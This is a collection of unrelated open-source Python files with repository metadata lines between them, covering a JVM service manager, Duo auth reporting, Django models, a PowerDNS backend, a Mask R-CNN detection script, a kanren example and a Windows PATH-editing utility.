remove_folder_if_exists(unzipped_dir)
os.makedirs(unzipped_dir)
zipfile.ZipFile(zip_filename, 'r').extractall(unzipped_dir)
folder = os.listdir(unzipped_dir)[0]
target_dir = unzipped_dir + "/" + service_data["binary"]["destinationSubdir"]
shutil.move(unzipped_dir + "/" + folder, target_dir)
return target_dir
def sbt_extra_params(self):
sbt_extra_params = self._build_extra_params()
if "extra_params" in self.service_data["sources"]:
sbt_extra_params += self.service_data["sources"]["extra_params"]
return sbt_extra_params
def start_from_sources(self):
sbt_extra_params = self.sbt_extra_params()
service_data = self.context.service_data(self.service_name)
microservice_path = self.context.application.workspace + service_data["location"]
curr_dir = force_pushdir(microservice_path)
env_copy = os.environ.copy()
env_copy["SBT_EXTRA_PARAMS"] = " ".join(sbt_extra_params) # TODO: not needed i think anymore...
makedirs_if_not_exists("logs")
with open("logs/stdout.txt", "wb") as out, open("logs/stderr.txt", "wb") as err:
process = Popen(self.get_start_command("SOURCE"), env=env_copy, stdout=out, stderr=err, stdin=subprocess.PIPE)
process.stdin.close()
if process.returncode == 1:
print b.fail + "ERROR: could not start '" + self.service_name + "' " + b.endc
return process.pid # Note: This is the parent pid
class SmPlayService(SmJvmService):
@staticmethod
def unzipped_dir_path(context, location):
return context.application.config["playExtractionDir"] + location + "_" + context.instance_id
def __init__(self, context, service_name):
SmJvmService.__init__(self, context, service_name, "play")
self.default_port = self.required_data("defaultPort")
self.healthcheck = self.required_data("healthcheck")
def post_stop(self):
pass
def clean_up(self):
unzip_path = SmPlayService.unzipped_dir_path(self.context, self.service_data["location"])
remove_folder_if_exists(unzip_path)
def get_details_url(self):
return "http://localhost:${port}/admin/details"
def get_port_argument(self):
return "http.port"
def get_running_healthcheck_port(self, process):
return process.extract_integer_argument('-D%s=(\d*)' % self.get_port_argument(), self.default_port)
| 1.914063 | 2 |
plugins/duo_auth/vendor/duo_client_python/examples/report_auths_by_country.py | lukaszlaszuk/insightconnect-plugins | 46 | 12773234 | #!/usr/bin/env python
from __future__ import print_function
from __future__ import absolute_import
import csv
import sys
import duo_client
import json
from six.moves import input
argv_iter = iter(sys.argv[1:])
def get_next_arg(prompt):
try:
return next(argv_iter)
except StopIteration:
return input(prompt)
# Configuration and information about objects to create.
admin_api = duo_client.Admin(
ikey=get_next_arg('Admin API integration key ("DI..."): '),
skey=get_next_arg("integration secret key: "),
host=get_next_arg('API hostname ("api-....duosecurity.com"): '),
)
# Retrieve log info from API:
logs = admin_api.get_authentication_log()
# Count authentications by country:
counts = dict()
for log in logs:
country = log["location"]["country"]
if country != "":
counts[country] = counts.get(country, 0) + 1
# Print CSV of country, auth count:
auths_descending = sorted(counts.items(), reverse=True)
reporter = csv.writer(sys.stdout)
print("[+] Report of auth counts by country:")
reporter.writerow(("Country", "Auth Count"))
for row in auths_descending:
reporter.writerow(
[
row[0],
row[1],
]
)
| 2.453125 | 2 |
examples/pow/ex3.py | mcorne/python-by-example | 0 | 12773235 | print(pow(9, 2, 10))
| 2.265625 | 2 |
gram/admin.py | swanapole/insta | 0 | 12773236 | from django.contrib import admin
from .models import Post,Location
# Register your models here.
admin.site.register(Post)
admin.site.register(Location)
| 1.34375 | 1 |
vote/migrations/0021_auto_20201103_1923.py | stustanet/Wahlfang | 21 | 12773237 | <gh_stars>10-100
# Generated by Django 3.1.2 on 2020-11-03 18:23
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('vote', '0020_election_remind_text_sent'),
]
operations = [
migrations.AlterField(
model_name='session',
name='start_date',
field=models.DateTimeField(blank=True, null=True),
),
]
| 1.421875 | 1 |
rainbowhatwrapper/util/RhDisplayUtil.py | akd001/RPi | 1 | 12773238 | import rainbowhat as rh
def showRhDisplay():
try:
rh.display.show()
except Exception as e:
print str(e)
def clearRhDisplay():
try:
rh.display.clear()
except Exception as e:
print str(e)
def printRhDisplay(stringToPrint):
try:
rh.display.print_str(stringToPrint)
except Exception as e:
print str(e) | 2.5 | 2 |
src/test_utils.py | reinaqu/reportingslroo | 0 | 12773239 | '''
Created on 28 nov. 2021
@author: reinaqu_2
'''
import configurations
import DashboardDataExtraction as datextdash
import PublicationsQuality as pubq
from typing import TypeVar,Callable,Dict,List, Set
K = TypeVar('K')
V = TypeVar('V')
def mostrar_dict(d: Dict[str, Set[str]]):
for k,v in sorted(d.items()):
print (k, '-->', list(v))
def show_quality_bubble_plot(quality_file:str, datadash:datextdash.DashboardDataExtraction):
pub_quality = pubq.PublicationsQuality.of_excel(quality_file, configurations.config_publ)
datadash.set_publications_quality(pub_quality)
print(pub_quality.count_pairs_per_quality_measure)
datadash.create_bubble_quality()
def show_dict_from_multivalued_column(datadash:datextdash.DashboardDataExtraction, column_name: str):
d =datadash.create_dict_from_multivalued_column(column_name)
mostrar_dict(d)
| 2.609375 | 3 |
zci_bio/annotations/cpgavas.py | CroP-BioDiv/zcitools | 0 | 12773240 | from zci_bio.annotations.steps import AnnotationsStep
from common_utils.file_utils import write_fasta # copy_file, link_file
_instructions = """
Open web page http://www.herbalgenomics.org/cpgavas/
Probably one of mirrors:
Mirror 1: Central China : http://172.16.17.32:16019/analyzer/home
Mirror 2: East Coast USA : http://172.16.17.32:16019/analyzer/home (more stable)
For each sequence (fas file) do:
* Upload file: sequence.fas
* Specify project name, species name if needed, and email address for notification.
* Leave other data on default
* Submit job
* When job is finished:
- download Global multi-GenBank file into job directory ({abspath})
- run zcit command: zcit.py finish {step_name}
The paper describing CPGAVAS2 can be found here:
https://academic.oup.com/nar/advance-article/doi/10.1093/nar/gkz345/5486746
"""
def create_cpgavas_data(step_data, sequences_step):
step = AnnotationsStep(sequences_step.project, step_data, remove_data=True)
# Store sequence
for seq_ident in sequences_step.all_sequences():
seq = sequences_step.get_sequence(seq_ident)
seq = seq.replace('N', '')
# ToDo: napraviti mapiranje
write_fasta(step.step_file(seq_ident + '.fas'), [(seq_ident, seq)])
# Store instructions
with open(step.step_file('INSTRUCTIONS.txt'), 'w') as out:
out.write(_instructions.format(abspath=step.absolute_path(), step_name=step_data['step_name']))
#
step.set_sequences(sequences_step.all_sequences())
step.save(completed=False)
return step
def finish_cpgavas_data(step_obj):
prnt("ToDo: ...")
# # Check file named: GeSeqJob-<num>-<num>_GLOBAL_multi-GenBank.gbff
# for f in step_obj.step_files():
# if f.startswith('GeSeqJob') and f.endswith('_GLOBAL_multi-GenBank.gbff'):
# filename = f
# break
# else:
# print("Warning: can't find GeSeq output file!")
# return
# # Leave original file
# # ToDo: repair and filter data???
# # ToDo: inverted_region 126081..1 !!! To_ind > from_ind!!!
# copy_file(step_obj.step_file(filename), step_obj.get_all_annotation_filename())
# step_obj._check_data()
# step_obj.save()
| 2.421875 | 2 |
pychron/updater/branch_view.py | ael-noblegas/pychron | 1 | 12773241 | <gh_stars>1-10
# # ===============================================================================
# # Copyright 2015 <NAME>
# #
# # Licensed under the Apache License, Version 2.0 (the "License");
# # you may not use this file except in compliance with the License.
# # You may obtain a copy of the License at
# #
# # http://www.apache.org/licenses/LICENSE-2.0
# #
# # Unless required by applicable law or agreed to in writing, software
# # distributed under the License is distributed on an "AS IS" BASIS,
# # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# # See the License for the specific language governing permissions and
# # limitations under the License.
# # ===============================================================================
#
# # ============= enthought library imports =======================
# from __future__ import absolute_import
# from traitsui.api import View, UItem, HGroup, VGroup
# from traitsui.editors import EnumEditor
# from traitsui.handler import Controller
# # ============= standard library imports ========================
# # ============= local library imports ==========================
# from pychron.envisage.icon_button_editor import icon_button_editor
#
#
# class NewBranchView(Controller):
# def traits_view(self):
# v = View(UItem('new_branch_name'),
# title='New Branch Name',
# width=300,
# kind='livemodal',
# buttons=['OK', 'Cancel'])
# return v
#
#
# class ManageBranchView(Controller):
# def traits_view(self):
# v = View(
# VGroup(
# VGroup(HGroup(UItem('branch', editor=EnumEditor(name='all_branches')),
# # icon_button_editor('build_button', 'bricks',
# # tooltip='Build selected branch and set as current application'),
# icon_button_editor('checkout_branch_button', 'bricks',
# tooltip='Checkout selected branch'),
# icon_button_editor('pull_button', 'arrow_down',
# tooltip='Update Branch'),
# show_border=True,
# label='Current Branch'))),
# # VGroup(UItem('edit_branch', editor=EnumEditor(name='branches')),
# # UItem('delete_button', enabled_when='delete_enabled'),
# # show_border=True)),
# title='Manage Branch View',
# buttons=['OK', 'Cancel'])
# return v
#
# # ============= EOF =============================================
| 1.367188 | 1 |
designate/backend/impl_powerdns/__init__.py | melodous/designate | 0 | 12773242 | # Copyright 2012 Hewlett-Packard Development Company, L.P. All Rights Reserved.
# Copyright 2012 Managed I.T.
#
# Author: <NAME> <<EMAIL>>
# Author: <NAME> <<EMAIL>>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import base64
import threading
from oslo.config import cfg
from oslo.db import options
from sqlalchemy.sql import select
from designate.openstack.common import excutils
from designate.openstack.common import log as logging
from designate.i18n import _LC
from designate import exceptions
from designate.backend import base
from designate.backend.impl_powerdns import tables
from designate.sqlalchemy import session
from designate.sqlalchemy.expressions import InsertFromSelect
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
TSIG_SUPPORTED_ALGORITHMS = ['hmac-md5']
CONF.register_group(cfg.OptGroup(
name='backend:powerdns', title="Configuration for Powerdns Backend"
))
CONF.register_opts([
cfg.StrOpt('domain-type', default='NATIVE', help='PowerDNS Domain Type'),
cfg.ListOpt('also-notify', default=[], help='List of additional IPs to '
'send NOTIFYs to'),
] + options.database_opts, group='backend:powerdns')
# Overide the default DB connection registered above, to avoid name conflicts
# between the Designate and PowerDNS databases.
CONF.set_default('connection', 'sqlite:///$state_path/powerdns.sqlite',
group='backend:powerdns')
def _map_col(keys, col):
return dict([(keys[i], col[i]) for i in range(len(keys))])
class PowerDNSBackend(base.Backend):
__plugin_name__ = 'powerdns'
def __init__(self, *args, **kwargs):
super(PowerDNSBackend, self).__init__(*args, **kwargs)
self.local_store = threading.local()
def start(self):
super(PowerDNSBackend, self).start()
@property
def session(self):
# NOTE: This uses a thread local store, allowing each greenthread to
# have it's own session stored correctly. Without this, each
# greenthread may end up using a single global session, which
# leads to bad things happening.
global LOCAL_STORE
if not hasattr(self.local_store, 'session'):
self.local_store.session = session.get_session(self.name)
return self.local_store.session
def _create(self, table, values):
query = table.insert()
resultproxy = self.session.execute(query, values)
# Refetch the row, for generated columns etc
query = select([table])\
.where(table.c.id == resultproxy.inserted_primary_key[0])
resultproxy = self.session.execute(query)
return _map_col(query.columns.keys(), resultproxy.fetchone())
def _update(self, table, values, exc_notfound, id_col=None):
if id_col is None:
id_col = table.c.id
query = table.update()\
.where(id_col == values[id_col.name])\
.values(**values)
resultproxy = self.session.execute(query)
if resultproxy.rowcount != 1:
raise exc_notfound()
# Refetch the row, for generated columns etc
query = select([table])\
.where(id_col == values[id_col.name])
resultproxy = self.session.execute(query)
return _map_col(query.columns.keys(), resultproxy.fetchone())
def _get(self, table, id_, exc_notfound, id_col=None):
if id_col is None:
id_col = table.c.id
query = select([table])\
.where(id_col == id_)
resultproxy = self.session.execute(query)
results = resultproxy.fetchall()
if len(results) != 1:
raise exc_notfound()
# Map col keys to values in result
return _map_col(query.columns.keys(), results[0])
def _delete(self, table, id_, exc_notfound, id_col=None):
if id_col is None:
id_col = table.c.id
query = table.delete()\
.where(id_col == id_)
resultproxy = self.session.execute(query)
if resultproxy.rowcount != 1:
raise exc_notfound()
# TSIG Key Methods
def create_tsigkey(self, context, tsigkey):
"""Create a TSIG Key"""
if tsigkey['algorithm'] not in TSIG_SUPPORTED_ALGORITHMS:
raise exceptions.NotImplemented('Unsupported algorithm')
values = {
'designate_id': tsigkey['id'],
'name': tsigkey['name'],
'algorithm': tsigkey['algorithm'],
'secret': base64.b64encode(tsigkey['secret'])
}
self._create(tables.tsigkeys, values)
# NOTE(kiall): Prepare and execute query to install this TSIG Key on
# every domain. We use a manual query here since anything
# else would be impossibly slow.
query_select = select([
tables.domains.c.id,
"'TSIG-ALLOW-AXFR'",
"'%s'" % tsigkey['name']]
)
columns = [
tables.domain_metadata.c.domain_id,
tables.domain_metadata.c.kind,
tables.domain_metadata.c.content,
]
query = InsertFromSelect(tables.domain_metadata, query_select,
columns)
# NOTE(kiall): A TX is required for, at the least, SQLite.
self.session.begin()
self.session.execute(query)
self.session.commit()
def update_tsigkey(self, context, tsigkey):
"""Update a TSIG Key"""
values = self._get(
tables.tsigkeys,
tsigkey['id'],
exceptions.TsigKeyNotFound,
id_col=tables.tsigkeys.c.designate_id)
# Store a copy of the original name..
original_name = values['name']
values.update({
'name': tsigkey['name'],
'algorithm': tsigkey['algorithm'],
'secret': base64.b64encode(tsigkey['secret'])
})
self._update(tables.tsigkeys, values,
id_col=tables.tsigkeys.c.designate_id,
exc_notfound=exceptions.TsigKeyNotFound)
# If the name changed, Update the necessary DomainMetadata records
if original_name != tsigkey['name']:
query = tables.domain_metadata.update()\
.where(tables.domain_metadata.c.kind == 'TSIG_ALLOW_AXFR')\
.where(tables.domain_metadata.c.content == original_name)
query.values(content=tsigkey['name'])
self.session.execute(query)
def delete_tsigkey(self, context, tsigkey):
"""Delete a TSIG Key"""
try:
# Delete this TSIG Key itself
self._delete(
tables.tsigkeys, tsigkey['id'],
exceptions.TsigKeyNotFound,
id_col=tables.tsigkeys.c.designate_id)
except exceptions.TsigKeyNotFound:
# If the TSIG Key is already gone, that's ok. We're deleting it
# anyway, so just log and continue.
LOG.critical(_LC('Attempted to delete a TSIG key which is '
'not present in the backend. ID: %s') %
tsigkey['id'])
return
query = tables.domain_metadata.delete()\
.where(tables.domain_metadata.c.kind == 'TSIG-ALLOW-AXFR')\
.where(tables.domain_metadata.c.content == tsigkey['name'])
self.session.execute(query)
# Domain Methods
def create_domain(self, context, domain):
try:
self.session.begin()
servers = self.central_service.find_servers(self.admin_context)
domain_values = {
'designate_id': domain['id'],
'name': domain['name'].rstrip('.'),
'master': servers[0]['name'].rstrip('.'),
'type': CONF['backend:powerdns'].domain_type,
'account': context.tenant
}
domain_ref = self._create(tables.domains, domain_values)
# Install all TSIG Keys on this domain
query = select([tables.tsigkeys.c.name])
resultproxy = self.session.execute(query)
values = [i for i in resultproxy.fetchall()]
self._update_domainmetadata(domain_ref['id'], 'TSIG-ALLOW-AXFR',
values)
# Install all Also Notify's on this domain
self._update_domainmetadata(domain_ref['id'], 'ALSO-NOTIFY',
CONF['backend:powerdns'].also_notify)
except Exception:
with excutils.save_and_reraise_exception():
self.session.rollback()
else:
self.session.commit()
def update_domain(self, context, domain):
domain_ref = self._get(tables.domains, domain['id'],
exceptions.DomainNotFound,
id_col=tables.domains.c.designate_id)
try:
self.session.begin()
# Update the Records TTLs where necessary
query = tables.records.update()\
.where(tables.records.c.domain_id == domain_ref['id'])
query = query.where(tables.records.c.inherit_ttl == True) # noqa\
query = query.values(ttl=domain['ttl'])
self.session.execute(query)
except Exception:
with excutils.save_and_reraise_exception():
self.session.rollback()
else:
self.session.commit()
def delete_domain(self, context, domain):
try:
domain_ref = self._get(tables.domains, domain['id'],
exceptions.DomainNotFound,
id_col=tables.domains.c.designate_id)
except exceptions.DomainNotFound:
# If the Domain is already gone, that's ok. We're deleting it
# anyway, so just log and continue.
LOG.critical(_LC('Attempted to delete a domain which is '
'not present in the backend. ID: %s') %
domain['id'])
return
self._delete(tables.domains, domain['id'],
exceptions.DomainNotFound,
id_col=tables.domains.c.designate_id)
# Ensure the records are deleted
query = tables.records.delete()\
.where(tables.records.c.domain_id == domain_ref['id'])
self.session.execute(query)
# Ensure domainmetadata is deleted
query = tables.domain_metadata.delete()\
.where(tables.domain_metadata.c.domain_id == domain_ref['id'])
self.session.execute(query)
# RecordSet Methods
def create_recordset(self, context, domain, recordset):
try:
self.session.begin(subtransactions=True)
# Create all the records..
for record in recordset.records:
self.create_record(context, domain, recordset, record)
except Exception:
with excutils.save_and_reraise_exception():
self.session.rollback()
else:
self.session.commit()
def update_recordset(self, context, domain, recordset):
# TODO(kiall): This is a total kludge. Intended as the simplest
# possible fix for the issue. This needs to be
# re-implemented correctly.
try:
self.session.begin(subtransactions=True)
self.delete_recordset(context, domain, recordset)
self.create_recordset(context, domain, recordset)
except Exception:
with excutils.save_and_reraise_exception():
self.session.rollback()
else:
self.session.commit()
def delete_recordset(self, context, domain, recordset):
# Ensure records are deleted
query = tables.records.delete()\
.where(tables.records.c.designate_recordset_id == recordset['id'])
self.session.execute(query)
# Record Methods
def create_record(self, context, domain, recordset, record):
domain_ref = self._get(tables.domains, domain['id'],
exceptions.DomainNotFound,
id_col=tables.domains.c.designate_id)
content = self._sanitize_content(recordset['type'], record['data'])
ttl = domain['ttl'] if recordset['ttl'] is None else recordset['ttl']
record_values = {
'designate_id': record['id'],
'designate_recordset_id': record['recordset_id'],
'domain_id': domain_ref['id'],
'name': recordset['name'].rstrip('.'),
'type': recordset['type'],
'content': content,
'ttl': ttl,
'inherit_ttl': True if recordset['ttl'] is None else False,
'prio': record['priority'],
'auth': self._is_authoritative(domain, recordset, record)
}
self._create(tables.records, record_values)
def update_record(self, context, domain, recordset, record):
record_ref = self._get_record(record['id'])
content = self._sanitize_content(recordset['type'], record['data'])
ttl = domain['ttl'] if recordset['ttl'] is None else recordset['ttl']
record_ref.update({
'content': content,
'ttl': ttl,
'inherit_ttl': True if recordset['ttl'] is None else False,
'prio': record['priority'],
'auth': self._is_authoritative(domain, recordset, record)
})
self._update(tables.records, record_ref,
exc_notfound=exceptions.RecordNotFound)
def delete_record(self, context, domain, recordset, record):
try:
record_ref = self._get(tables.records, record['id'],
exceptions.RecordNotFound,
id_col=tables.records.c.designate_id)
except exceptions.RecordNotFound:
# If the Record is already gone, that's ok. We're deleting it
# anyway, so just log and continue.
LOG.critical(_LC('Attempted to delete a record which is '
'not present in the backend. ID: %s') %
record['id'])
else:
self._delete(tables.records, record_ref['id'],
exceptions.RecordNotFound)
# Internal Methods
def _update_domainmetadata(self, domain_id, kind, values=None,
delete=True):
"""Updates a domain's metadata with new values"""
# Fetch all current metadata of the specified kind
values = values or []
query = select([tables.domain_metadata.c.content])\
.where(tables.domain_metadata.c.domain_id == domain_id)\
.where(tables.domain_metadata.c.kind == kind)
resultproxy = self.session.execute(query)
results = resultproxy.fetchall()
for metadata_id, content in results:
if content not in values:
if delete:
LOG.debug('Deleting stale domain metadata: %r' %
([domain_id, kind, content],))
# Delete no longer necessary values
# We should never get a notfound here, so UnknownFailure is
# a reasonable choice.
self._delete(tables.domain_metadata, metadata_id,
exceptions.UnknownFailure)
else:
# Remove pre-existing values from the list of values to insert
values.remove(content)
# Insert new values
for value in values:
LOG.debug('Inserting new domain metadata: %r' %
([domain_id, kind, value],))
self._create(
tables.domain_metadata,
{
"domain_id": domain_id,
"kind": kind,
"content": value
})
def _is_authoritative(self, domain, recordset, record):
# NOTE(kiall): See http://doc.powerdns.com/dnssec-modes.html
if recordset['type'] == 'NS' and recordset['name'] != domain['name']:
return False
else:
return True
def _sanitize_content(self, type, content):
if type in ('CNAME', 'MX', 'SRV', 'NS', 'PTR'):
return content.rstrip('.')
if type in ('TXT', 'SPF'):
return '"%s"' % content.replace('"', '\\"')
return content
def _get_record(self, record_id=None, domain=None, type_=None):
query = select([tables.records])
if record_id:
query = query.where(tables.records.c.designate_id == record_id)
if type_:
query = query.where(tables.records.c.type == type_)
if domain:
query = query.where(tables.records.c.domain_id == domain['id'])
resultproxy = self.session.execute(query)
results = resultproxy.fetchall()
if len(results) < 1:
raise exceptions.RecordNotFound('No record found')
elif len(results) > 1:
raise exceptions.RecordNotFound('Too many records found')
else:
return _map_col(query.columns.keys(), results[0])
| 1.554688 | 2 |
src/util.py | weijinqian0/feature_eda | 6 | 12773243 | <reponame>weijinqian0/feature_eda
import json
import re
import time
import numpy as np
def parse_json(json_str):
return json.loads(json_str)
def write_json(json_path, object):
with open(json_path, 'w') as wf:
wf.write(json.dumps(object))
def read_json(json_path):
with open(json_path, 'r') as rf:
line = rf.readline()
return json.loads(line.strip())
def get_numbers(text):
return re.sub("\D", '', text)
def round(value):
return np.round(value, 3)
def char_count(text, anchor):
"""
字符在文本中出现的次数
:param text:
:param anchor:
:return:
"""
return len(text.split(anchor)) - 1
def date_to_stamp(date):
"""将日期转化为时间戳
:param date: 待转化的日期
:return: 转化后的时间数据
"""
# 先转换为时间数组,完整的为"%Y-%m-%d %H:%M:%S"
timeArray = time.strptime(date, "%Y-%m-%d")
# 转换为时间戳
time_stamp = int(time.mktime(timeArray))
return time_stamp
def stamp_to_time(time_stamp):
"""将时间戳转化成普通时间的格式
:param time_stamp: 时间戳
:return: 时间戳对应的日期
"""
stamp = time.localtime(time_stamp)
local_time = time.strftime("%Y-%m-%d", stamp)
return local_time
if __name__ == '__main__':
print(get_numbers("abc123"))
print(char_count('我们是谁是谁是啥', '是'))
# write_json('./a', ['a', 'b', 'v'])
# print(read_json('./a'))
| 2.828125 | 3 |
setup.py | pypyr-scheduler/pypyr-scheduler-rpc-client | 1 | 12773244 | from setuptools import (setup, find_namespace_packages)
from os import path
from pkg_resources import parse_version
from pyrsched.rpc import (NAME, VERSION)
here = path.abspath(path.dirname(__file__))
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
LONG_DESCRIPTION = f.read()
setup(
name=NAME,
version=VERSION,
description="RPC client for pypyr-scheduler-server",
long_description=LONG_DESCRIPTION,
long_description_content_type='text/markdown',
url=f"https://github.com/pypyr-scheduler/{NAME}",
license='MIT',
author='<NAME>',
author_email="<EMAIL>",
classifiers=[
'Intended Audience :: Developers',
"License :: OSI Approved :: MIT License",
"Programming Language :: Python",
"Programming Language :: Python :: 3.7",
],
keywords=["Pypyr", "Scheduler", "Taskrunner"],
packages=find_namespace_packages(include=['pyrsched.*', ]),
namespace_packages=['pyrsched'],
include_package_data=True,
setup_requires=['pytest-runner'],
tests_require=['pytest'],
)
| 1.46875 | 1 |
detection/run_mask.py | katerynaCh/Finnish-WW2-photographers-analysis | 3 | 12773245 | import sys
sys.path.append('../src/')
import os
import numpy as np
from mask_rcnn.mrcnn import utils
import mask_rcnn.mrcnn.model as modellib
from mask_rcnn.samples.coco import coco
import cv2
import argparse as ap
class InferenceConfig(coco.CocoConfig):
# Set batch size to 1 since we'll be running inference on
# one image at a time. Batch size = GPU_COUNT * IMAGES_PER_GPU
GPU_COUNT = 1
IMAGES_PER_GPU = 1
def get_mask_rcnn(model, image, COCO_MODEL_PATH):
# Run detection
results = model.detect([image], verbose=1)
r = results[0]
idx = np.where(r['class_ids'] != 0) #select non-background
boxes = r['rois'][idx]
scores = r['scores'][idx]
classes = r['class_ids'][idx]
#score threshold = 0.7
idxs = np.where(scores > 0.7)
boxes = boxes[idxs]
people_scores = scores[idxs]
classes = classes[idxs]
return boxes, scores, classes
def run(read_direc, save_direc, model, COCO_MODEL_PATH, class_names, save_image=False):
if os.path.exists('./processed_images_mask.txt'):
with open('./processed_images_mask.txt', 'r') as f:
processed_files = f.readlines()
else:
processed_files = []
print('Started:', save_direc, read_direc)
if not os.path.exists(save_direc+'/'):
os.mkdir(save_direc+'/')
if save_image:
if not os.path.exists(save_direc+'/images_mask/'):
os.mkdir(save_direc + '/images_mask/')
i=0
for fi in os.listdir(read_direc):
if fi + '\n' in processed_files:
print('Skipping ', fi)
continue
image = cv2.imread(read_direc +fi)
#histogram equalization
image = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
image[:,:,2] = cv2.equalizeHist(image[:,:,2])
image = cv2.cvtColor(image, cv2.COLOR_HSV2BGR)
i = i+1
if i % 1000 == 0:
print('Processed ' + str(i) + 'images')
scaler_y = np.shape(image)[0]/960
scaler_x = np.shape(image)[1]/540
image1 = cv2.resize(image, (540, 960))
mask_boxes, mask_scores, mask_classes = get_mask_rcnn(model, image1, COCO_MODEL_PATH)
for bbox, score, classid in zip(mask_boxes, mask_scores, mask_classes):
bbox[1] = int(bbox[1])*scaler_x
bbox[0] = int(bbox[0])*scaler_y
bbox[3] = int(bbox[3])*scaler_x
bbox[2] = int(bbox[2])*scaler_y
with open(save_direc+'/groundtruth_boxes_mask.txt', 'a') as f:
f.write(str(fi) + ' ' + str(bbox[1])+ ' ' + str(bbox[0]) + ' ' + str(bbox[3]) + ' ' + str(bbox[2]) + ' ' + str(score) + ' ' + class_names[classid] + '\n')
if save_image:
cv2.rectangle(image, (int(bbox[1]+1), int(bbox[0]+1)), (int(bbox[3]+1), int(bbox[2]+1)), (0,255,0), 3)
cv2.putText(image, class_names[classid], (round(float(bbox[1])), round(float(bbox[0]))), cv2.FONT_HERSHEY_SIMPLEX, 4,(0,0,255),10,cv2.LINE_AA)
with open('./processed_images_mask.txt', 'a') as f:
f.write(fi + '\n')
if save_image:
cv2.imwrite(save_direc+'/images_mask/' + str(i) + '.jpg', image)
if __name__ == '__main__':
parser = ap.ArgumentParser()
parser.add_argument('-r', "--readdir", help="Directory with images")
parser.add_argument('-s', "--savedir", help="Directory for saving the detection results")
parser.add_argument('-i', "--saveimage", action='store_true', help="Save image with predicted bounding box or not")
args = vars(parser.parse_args())
read_direc = args['readdir']
save_direc = args['savedir']
COCO_MODEL_PATH = "../src/models/mask_rcnn_coco.h5"
MODEL_DIR = os.path.join('mask_rcnn/', "logs")
class_names = ['BG', 'person', 'bicycle', 'car', 'motorcycle', 'airplane',
'bus', 'train', 'truck', 'boat', 'trafficlight',
'fire hydrant', 'stop sign', 'parkingmeter', 'bench', 'bird',
'cat', 'dog', 'horse', 'sheep', 'cow', 'elephant', 'bear',
'zebra', 'giraffe', 'backpack', 'umbrella', 'handbag', 'tie',
'suitcase', 'frisbee', 'skis', 'snowboard', 'sportsball',
'kite', 'baseballbat', 'baseballglove', 'skateboard',
'surfboard', 'tennisracket', 'bottle', 'wineglass', 'cup',
'fork', 'knife', 'spoon', 'bowl', 'banana', 'apple',
'sandwich', 'orange', 'broccoli', 'carrot', 'hotdog', 'pizza',
'donut', 'cake', 'chair', 'couch', 'pottedplant', 'bed',
'dining table', 'toilet', 'tv', 'laptop', 'mouse', 'remote',
'keyboard', 'cellphone', 'microwave', 'oven', 'toaster',
'sink', 'refrigerator', 'book', 'clock', 'vase', 'scissors',
'teddybear', 'hairdrier', 'toothbrush']
config = InferenceConfig()
# Create model object in inference mode.
model = modellib.MaskRCNN(mode="inference", model_dir=MODEL_DIR, config=config)
# Load weights trained on MS-COCO
model.load_weights(COCO_MODEL_PATH, by_name=True)
run(read_direc, save_direc, model, COCO_MODEL_PATH, class_names, args['saveimage'])
print('Finished')
| 2.25 | 2 |
game/model/entity/damage/damage.py | AntonYermilov/progue | 0 | 12773246 | <reponame>AntonYermilov/progue
from dataclasses import dataclass
from enum import Enum
class DamageType(Enum):
PHYSICAL = 0
MAGIC = 1
HEALING = 2
@dataclass
class Damage:
"""
Damage class.
"""
damage_type: DamageType
damage_amount: int
confuse_turns: int = 0
| 2.984375 | 3 |
tutorialspoint/logic_programming.py | enthusiasticgeek/AI | 0 | 12773247 | #!/usr/bin/env python3
from kanren import run, var, fact
from kanren.assoccomm import eq_assoccomm as eq
from kanren.assoccomm import commutative, associative
#define math operations
add = 'add'
mul = 'mul'
#define commutative/associative
fact(commutative, mul)
fact(commutative, add)
fact(associative, mul)
fact(associative, add)
#define variables
a, b = var('a'), var('b')
#Original pattern (5+a)*b
Original_pattern = (mul, (add, 5, a), b)
#Two Expressions
exp1 = (mul, (add,5,3), 4)
exp2 = (mul, 2, (add, 5, 1))
exp3 = (add, 5, (mul, 8, 1)) #(8*1+5)
#Output
print(run(0, (a,b), eq(Original_pattern, exp1)))
print(run(0, (a,b), eq(Original_pattern, exp2)))
print(run(0, (a,b), eq(Original_pattern, exp3)))
| 3.078125 | 3 |
recipes/Python/577233_Adding_directory_pythexecutable_system_PATH/recipe-577233.py | tdiprima/code | 2,023 | 12773248 | """
a small program to run after the installation of python on windows
adds the directory path to the python executable to the PATH env. variable
with optional parameter remove, removes it
you have to open a new command prompt to see the effects (echo %PATH%)
"""
import sys
import os
import time
import _winreg
import ctypes
def extend(pypath):
'''
extend(pypath) adds pypath to the PATH env. variable as defined in the
registry, and then notifies applications (e.g. the desktop) of this change.
Already opened DOS-Command prompt are not updated. Newly opened will have the
new path (inherited from the updated windows explorer desktop)
'''
hKey = _winreg.OpenKey (_winreg.HKEY_LOCAL_MACHINE,
r'SYSTEM\CurrentControlSet\Control\Session Manager\Environment',
0, _winreg.KEY_READ | _winreg.KEY_SET_VALUE)
value, typ = _winreg.QueryValueEx (hKey, "PATH")
vals = value.split(';')
assert isinstance(vals, list)
if len(sys.argv) > 1 and sys.argv[1] == 'remove':
try:
vals.remove(pypath)
except ValueError:
print 'path element', pypath, 'not found'
return
print 'removing from PATH:', pypath
else:
if pypath in vals:
print 'path element', pypath, 'already in PATH'
return
vals.append(pypath)
print 'adding to PATH:', pypath
_winreg.SetValueEx(hKey, "PATH", 0, typ, ';'.join(vals) )
_winreg.FlushKey(hKey)
# notify other programs
SendMessage = ctypes.windll.user32.SendMessageW
HWND_BROADCAST = 0xFFFF
WM_SETTINGCHANGE = 0x1A
SendMessage(HWND_BROADCAST, WM_SETTINGCHANGE, 0, u'Environment')
def find_python():
'''
retrieves the commandline for .py extensions from the registry
'''
hKey = _winreg.OpenKey(_winreg.HKEY_CLASSES_ROOT,
r'Python.File\shell\open\command')
# get the default value
value, typ = _winreg.QueryValueEx (hKey, None)
program = value.split('"')[1]
if not program.lower().endswith(r'\python.exe'):
return None
